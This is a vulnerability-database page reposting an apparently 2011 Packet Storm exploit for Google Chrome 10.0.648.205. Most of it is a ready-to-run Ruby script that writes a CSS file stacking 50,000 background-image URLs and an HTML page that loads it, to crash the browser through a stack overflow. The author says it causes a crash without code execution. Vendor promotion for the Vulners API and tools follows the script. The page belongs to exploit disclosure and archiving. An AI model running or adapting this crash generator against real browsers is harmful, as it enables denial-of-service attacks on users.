Lucene search
K

Google Chrome 10.0.648.205 Stack Overflow

🗓️ 18 Apr 2011 00:00:00Reported by C4SS!0 G0M3SType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

Google Chrome 10.0.648.205 Stack Overflow Vulnerabilit

Code
`#!/usr/bin/ruby  
#  
#[+]Exploit Title: Google Chrome 10.0.648.205 Stack Overflow Vulnerability  
#[+]Date: 17\04\2011  
#[+]Author: C4SS!0 G0M3S  
#[+]Software Link: http://www.google.com/chrome  
#[+]Version: 10.0.648.205  
#[+]Teste On: WIN-XP SP3 Brazilian Portuguese  
#[+]CVE: N/A  
#  
#  
#  
#About:  
#  
#This is a bug of the Stack Overflow   
#that occurs when the safari or google chrome  
#deals with many URLs in the background-image  
#only causes a crash does not allow code execution.  
#  
#  
  
print """  
  
Created By C4SS!0 G0M3S  
E-mail [email protected]  
Site www.exploit-br.org  
"""  
css = """  
body  
{  
background-image:"""  
i=0  
while i<50000:  
css += "url('imagem.bmp'),"  
i+=1  
end  
css += "url('imagem.bmp');\n}\n"  
print "[+]Creating File style.css...\n"  
sleep(1)  
begin  
  
f = File.open("style.css","wb")  
f.write css  
f.close  
rescue  
print "Error:\n#{$!}\n"  
exit  
end  
print "[+]File Style.css Created With Sucess\n"  
sleep(1)  
HTML = '''  
<html>  
<head>  
  
<link rel="stylesheet" type="text/css" href="style.css"></link>  
  
</head>  
<body>  
  
  
</body>  
</html>  
'''  
print "[+]Creating File Exploit.html...\n"  
sleep(1)  
begin  
f = File.open("Exploit.html","wb")  
f.write HTML  
f.close  
rescue  
print "Error:\n#{$!}\n"  
end  
print "[+]File Exploit.html Created With Success\n"  
sleep(1)`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation